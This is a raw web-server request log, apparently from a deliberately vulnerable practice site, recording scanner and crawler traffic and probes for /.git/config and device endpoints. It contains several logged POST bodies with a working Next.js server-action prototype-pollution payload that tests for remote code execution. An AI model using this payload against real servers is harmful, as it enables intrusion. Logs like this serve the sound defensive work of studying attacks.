User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 206.189.105.50:48510
Path: /
URL: /
Method: GET
[2026-03-26 02:47:21] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.148.10.23
Via: 1.1 Caddy
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41710
Path: /.git/config
URL: /.git/config
Method: GET
[2026-03-26 02:39:12] === HTTP Request ===
[2026-03-26 01:52:54] Main page accessed - IP: 172.30.0.12:36652
===================
X-Forwarded-For: 74.7.242.49
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36652
Path: /
URL: /
Method: GET
[2026-03-26 01:52:54] === HTTP Request ===
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.244.39
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36652
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-26 01:52:51] === HTTP Request ===
[2026-03-26 01:30:00] Main page accessed - IP: 95.214.52.208:49204
===================
User-Agent: Hello World/1.0
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.52.208:49204
Path: /
URL: /
Method: GET
[2026-03-26 01:30:00] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 71.6.134.233:37134
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-26 00:53:34] === HTTP Request ===
[2026-03-26 00:53:02] Main page accessed - IP: 71.6.134.233:40998
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 71.6.134.233:40998
Path: /
URL: /
Method: GET
[2026-03-26 00:53:02] === HTTP Request ===
[2026-03-26 00:07:59] Main page accessed - IP: 157.230.44.79:56302
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 157.230.44.79:56302
Path: /
URL: /
Method: GET
[2026-03-26 00:07:59] === HTTP Request ===
[2026-03-25 22:31:32] Main page accessed - IP: 20.65.194.143:35174
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.65.194.143:35174
Path: /
URL: /
Method: GET
[2026-03-25 22:31:32] === HTTP Request ===
[2026-03-25 21:25:21] Main page accessed - IP: 198.235.24.246:53935
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.246:53935
Path: /
URL: /
Method: GET
[2026-03-25 21:25:21] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:55750
Path: /jars
URL: /jars
Method: GET
[2026-03-25 20:42:59] === HTTP Request ===
[2026-03-25 19:15:57] Main page accessed - IP: 147.185.132.231:60036
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.231:60036
Path: /
URL: /
Method: GET
[2026-03-25 19:15:57] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
X-Requested-With: XMLHttpRequest
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.224.92.125:36360
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-25 19:01:38] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, gzip, deflate
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
X-Requested-With: XMLHttpRequest
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:24098
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-25 18:39:47] === HTTP Request ===
[2026-03-25 18:28:08] Main page accessed - IP: 176.65.149.45:59170
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:59170
Path: /
URL: /
Method: GET
[2026-03-25 18:28:08] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.249.68.132
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
Accept: text/plain,text/html,*/*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:53306
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-25 18:07:41] === HTTP Request ===
[2026-03-25 18:02:09] Main page accessed - IP: 178.128.115.151:55082
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.115.151:55082
Path: /
URL: /
Method: GET
[2026-03-25 18:02:09] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.195.99:61852
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-25 14:54:29] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.195.99:61846
Path: *
URL: *
Method: PRI
[2026-03-25 14:54:27] === HTTP Request ===
[2026-03-25 14:54:27] Main page accessed - IP: 66.132.195.99:61838
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.195.99:61838
Path: /
URL: /
Method: GET
[2026-03-25 14:54:27] === HTTP Request ===
[2026-03-25 14:12:32] Main page accessed - IP: 24.199.126.56:55196
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 24.199.126.56:55196
Path: /
URL: /
Method: GET
[2026-03-25 14:12:32] === HTTP Request ===
[2026-03-25 12:42:26] Main page accessed - IP: 178.128.124.37:33958
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.124.37:33958
Path: /
URL: /
Method: GET
[2026-03-25 12:42:26] === HTTP Request ===
[2026-03-25 11:49:04] Main page accessed - IP: 46.101.82.104:49168
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 46.101.82.104:49168
Path: /
URL: /
Method: GET
[2026-03-25 11:49:04] === HTTP Request ===
[2026-03-25 11:14:33] Main page accessed - IP: 34.62.131.131:46396
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.62.131.131:46396
Path: /
URL: /
Method: GET
[2026-03-25 11:14:33] === HTTP Request ===
===================
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Safari/605.1.15
Cache-Control: no-cache
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.127:6981
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-25 10:22:39] === HTTP Request ===
[2026-03-25 10:22:27] Main page accessed - IP: 64.62.156.129:14733
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.129:14733
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-25 10:22:27] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.125:44881
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-25 10:21:33] === HTTP Request ===
[2026-03-25 10:20:58] Main page accessed - IP: 64.62.156.122:17880
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.63 Chrome/124.0.6367.63 Not-A.Brand/99  Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.122:17880
Path: /
URL: /
Method: GET
[2026-03-25 10:20:58] === HTTP Request ===
[2026-03-25 09:38:07] Main page accessed - IP: 34.79.198.196:56510
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.79.198.196:56510
Path: /
URL: /
Method: GET
[2026-03-25 09:38:07] === HTTP Request ===
===================
------WebKitFormBoundaryx1041684610121--
------WebKitFormBoundaryx1041684610121
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1041684610121
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 252406+true+4127020;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1041684610121
Accept-Encoding: gzip, deflate
Content-Length: 522
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1041684610121
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1041684610121
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:35092
Path: /api/route
URL: /api/route
Method: POST
[2026-03-25 09:17:25] === HTTP Request ===
===================
------WebKitFormBoundaryx72302654967--
------WebKitFormBoundaryx72302654967
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx72302654967
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 18302+true+3950533;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx72302654967
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_72302654967
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 513
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx72302654967
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:47544
Path: /app
URL: /app
Method: POST
[2026-03-25 09:17:19] === HTTP Request ===
===================
------WebKitFormBoundaryx386007585217--
------WebKitFormBoundaryx386007585217
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx386007585217
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 223894+true+1724064;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx386007585217
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx386007585217
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_386007585217
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:58538
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-25 09:17:13] === HTTP Request ===
===================
------WebKitFormBoundaryx250606904635--
------WebKitFormBoundaryx250606904635
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx250606904635
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 310298+true+807633;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx250606904635
X-Nextjs-Html-Request-Id: ilovepoop_250606904635
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx250606904635
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:58528
Path: /api
URL: /api
Method: POST
[2026-03-25 09:17:07] === HTTP Request ===
===================
------WebKitFormBoundaryx872319522049--
------WebKitFormBoundaryx872319522049
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx872319522049
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 315552+true+2764424;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx872319522049
X-Nextjs-Html-Request-Id: ilovepoop_872319522049
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx872319522049
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:57960
Path: /_next
URL: /_next
Method: POST
[2026-03-25 09:17:00] === HTTP Request ===
[2026-03-25 09:16:54] Main page accessed - IP: 45.205.1.18:36994
===================
------WebKitFormBoundaryx331864321721--
------WebKitFormBoundaryx331864321721
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx331864321721
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 89555+true+3705704;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx331864321721
X-Nextjs-Html-Request-Id: ilovepoop_331864321721
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx331864321721
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Content-Length: 517
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:36994
Path: /
URL: /
Method: POST
[2026-03-25 09:16:54] === HTTP Request ===
[2026-03-25 08:17:21] Main page accessed - IP: 130.211.93.147:39922
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 130.211.93.147:39922
Path: /
URL: /
Method: GET
[2026-03-25 08:17:21] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 157.230.125.158:7424
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-25 08:10:06] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 157.230.125.158:7418
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-25 08:10:06] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 157.230.125.158:7400
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-25 08:10:06] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 135.125.74.223:41842
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-25 07:58:17] === HTTP Request ===
[2026-03-25 07:58:17] Main page accessed - IP: 85.217.140.35:33090
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.35:33090
Path: /
URL: /
Method: GET
[2026-03-25 07:58:17] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:22600
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-25 07:54:45] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 185.226.198.7:53206
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-25 06:36:45] === HTTP Request ===
===================
Connection: keep-alive
Accept-Encoding: gzip, deflate
Sec-Fetch-Mode: cors
Content-Type: application/json
Accept-Language: *
Accept: application/json, text/event-stream
User-Agent: python-httpx/0.28.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 185.226.198.4:57084
Path: /sse
URL: /sse
Method: GET
[2026-03-25 06:36:45] === HTTP Request ===
===================
Body: {"jsonrpc":"2.0","id":6058651,"method":"initialize","params":{"protocolVersion":"2025-06-18","capabilities":{"sampling":{},"elicitation":{},"roots":{"listChanged":true}},"clientInfo":{"name":"gitmc-org-mcp-scanner","version":"1.0.0"}}}
Content-Type: application/json
Connection: keep-alive
Accept-Language: *
Accept: application/json, text/event-stream
User-Agent: python-httpx/0.28.1
Content-Length: 235
Accept-Encoding: gzip, deflate
Sec-Fetch-Mode: cors
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 185.226.198.4:57084
Path: /mcp
URL: /mcp
Method: POST
[2026-03-25 06:36:45] === HTTP Request ===
[2026-03-25 06:36:32] Main page accessed - IP: 185.226.198.4:57090
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 185.226.198.4:57090
Path: /
URL: /
Method: GET
[2026-03-25 06:36:32] === HTTP Request ===
[2026-03-24 18:17:11] Main page accessed - IP: 176.65.149.45:46452
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:46452
Path: /
URL: /
Method: GET
[2026-03-24 18:17:11] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6252
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6272
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6266
Path: /static/goods.js
URL: /static/goods.js
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6240
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
[2026-03-24 17:51:40] Login page accessed - IP: 64.181.201.187:6228
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6228
Path: /login
URL: /login
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
[2026-03-24 17:51:40] Defects page accessed - IP: 64.181.201.187:6252
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6252
Path: /defects
URL: /defects
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6218
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
[2026-03-24 17:51:40] Salary page accessed - IP: 64.181.201.187:6272
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip,deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6232
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6272
Path: /salary
URL: /salary
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
[2026-03-24 17:51:40] Logs page accessed - IP: 64.181.201.187:6284
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6284
Path: /logs
URL: /logs
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
[2026-03-24 17:51:40] Goods page accessed - IP: 64.181.201.187:6266
[2026-03-24 17:51:40] Cabinet page accessed - user_id: , IP: 64.181.201.187:6240
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6266
Path: /goods
URL: /goods
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6240
Path: /cabinet
URL: /cabinet
Method: GET
[2026-03-24 17:51:40] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip,deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6218
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-24 17:51:39] === HTTP Request ===
[2026-03-24 17:51:39] Main page accessed - IP: 64.181.201.187:6218
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.201.187:6218
Path: /
URL: /
Method: GET
